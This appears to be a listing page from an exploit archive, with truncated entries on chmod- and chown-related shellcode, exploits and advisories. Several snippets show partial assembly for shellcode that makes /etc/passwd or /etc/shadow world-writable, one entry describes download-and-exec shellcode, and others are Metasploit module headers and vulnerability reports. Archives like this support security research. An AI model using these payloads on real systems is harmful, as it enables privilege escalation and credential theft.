Qualcomm chown init scripts

Insecure owner/permission changes in init shell scripts CVE-2013-6124: During the device start-up phase, several init shell scripts are executed with root privileges to configure various aspects of the system. During this process, standard toolchain commands such as chown or chmod are used to,...

Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)

Linux/ARM - chmod /etc/passwd 0777 Shellcode 39 bytes. Shellcode exploit for ARM platform / Title : Linux/ARM - chmod"/etc/passwd", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x0...

Linux/x86 CMD[wget,mv,gcc,chmod] Download and exec() - sc_224 bytes

Linux/x86 , Run Multiple Commands wget,mv,gcc,chmod for Download a .c file and exec it !. ref : http://packetstorm.foofus.com/shellcode/dxk.c / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /...

linux/x86 execve-chmod 0777 /etc/shadow 58 bytes

Linux/x86 execve-chmod 0777 /etc/shadow 58 bytes Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom xor %eax,%eax push %eax pushl $0x776f6461 pushl $0x68732f2f pushl $0x6374652f movl %esp,%esi push %eax pushl $0x37373730 movl %esp,%ebp...

linux/ARM - chmod("/etc/shadow", 0777) - 41 bytes

/ Title: Linux/ARM - chmod"/etc/shadow", 0777 - 41 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 : 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov r0, pc 805e: 3012 adds r0, 18 8060: 21ff movs r1, 255 ; 0xff 8062: 31ff adds r1, 255 ; 0xff 8064:...

Raspberry Pi Linux/ARM - chmod"/etc/shadow", 0777 41 bytes

Raspberry Pi Linux/ARM - chmod"/etc/shadow", 0777 41 bytes. Shellcode exploit for arm platform / Title: Linux/ARM - chmod"/etc/shadow", 0777 - 41 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 : 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov r0,...

Linux x86 - chmod 666 /etc/passwd & /etc/shadow 57 bytes

Linux x86 - chmod 666 /etc/passwd & /etc/shadow 57 bytes. Shellcode exploit for linx86 platform / Title: Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes Author: Jean Pascal Pereira Web: http://0xffe4.org Disassembly of section .text: 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 66 b9...

linux/x86 - chmod 666 /etc/passwd & /etc/shadow - 57 bytes

/ Title: Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes Author: Jean Pascal Pereira Web: http://0xffe4.org Disassembly of section .text: 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 66 b9 b6 01 mov $0x1b6,%cx 8048066: 50 push %eax 8048067: 68 73 73 77 64 push $0x64777373 804806c: 68...

Setuid Nmap Exploit

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex' require 'msf/core/post/common' require...

Mod_Auth_OpenID Session Stealing

https://github.com/paranoid/modauthopenid/blob/master/CVE-2012-2760.markdown Security Advisory 1201 Summary : Session stealing Date : May 2012 Affected versions : all versions prior to modauthopenid-0.7 ID : modauthopenid-1201 CVE reference : CVE-2012-2760 Details Session ids are stored insecurel...

Anfibia Remote Command Execution

Exploit Title: Anfibia Remote Command Execution RCE Vulnerability Date: 2012-02-03 GMT +7 Author: BHG Security Center Discovered : Nitrojen90 Software Link: http://www.anfibia.com.br/ Dork: intext:"/op1.txt" "command" filetype:php Tested on: ubuntu 11.04 CVE : -...

TPSparkyRoot

A bug in chmod, mkdir and chown mean that they fail when the last element of their target path is a symlink...

mPDF <= 5.3 file disclosure and fix-vulnerability warning-the black bar safety net

Title: mPDF = 5.3 File Disclosure Author: ZadYree Download address: http://www.mpdf1.com/mpdf/download Affected versions: 5.3 and prior Test platform: multiple !/ usr/bin/perl-U =head1 TITLE mPDF = 5.3 File Disclosure Exploit 0day =head2 SYNOPSIS -- examples/showcode.php --...

Serv-U FTP Server Buffer Overflow

$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'Serv-U FTP...

bzexe /tmp Race Condition

Hi Packetstorm, This PoC exploit was developed after a discussion on Full-disclosure mailing list, where http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862 was proved to be exploitable. A user can wait until a binary that was compressed with bzexe is run by root and execute /tmp/exec. This...

SuSE 10 Security Update : coreutils (ZYPP Patch Number 7655)

This update of coreutils fixes the following security issue : - 697897: coreutils: when running 'su -c' to execute commands as different user the target user could inject command back into the calling users terminal via the TIOCSTI ioctl. This update also fixes the following non-security issues :...

CodeLock Encrypter v2.7 - Multiple Web Vulnerabilities

Document Title: =============== CodeLock Encrypter v2.7 - Multiple Web Vulnerabilities Release Date: ============= 2011-08-04 Vulnerability Laboratory ID VL-ID: ==================================== 102 Product & Service Introduction: =============================== The PHP/HTML Encryptor & The...

Linux/SuperH - sh4 - setuid0 - chmod"/etc/shadow", 0666 - exit0 43 bytes

Linux/SuperH - sh4 - setuid0 - chmod"/etc/shadow", 0666 - exit0 43 bytes. Shellcode exploit for sh4 platform / Title: Linux/SuperH - sh4 - setuid0 - chmod"/etc/shadow", 0666 - exit0 - 43 bytes Date: 2011-06-22 Tested on: Debian-sh4 2.6.32-5-sh7751r Author: Jonathan Salwan - twitter: @jonathansalw...

Linux/SuperH-sh4-setuid(0)-chmod("/etc/shadow", 0666)-exit(0)-43 bytes

/ Title: Linux/SuperH - sh4 - setuid0 - chmod"/etc/shadow", 0666 - exit0 - 43 bytes Date: 2011-06-22 Tested on: Debian-sh4 2.6.32-5-sh7751r Author: Jonathan Salwan - twitter: @shellstorm http://shell-storm.org seteuid: mov 23, r3 xor r4, r4 trapa 2 chmod: mov 15, r3 mova @24, pc, r0 mov r0, r4 mo...

Tastydir <= 1.2 (1216) Multiple Vulnerabilities

Exploit for php platform in category web applications =============================================== Tastydir = 1.2 1216 Multiple Vulnerabilities =============================================== Software Link: http://codecanyon.net/item/tastydir-an-ajax-file-manager-and-dir-listing/117167 Version...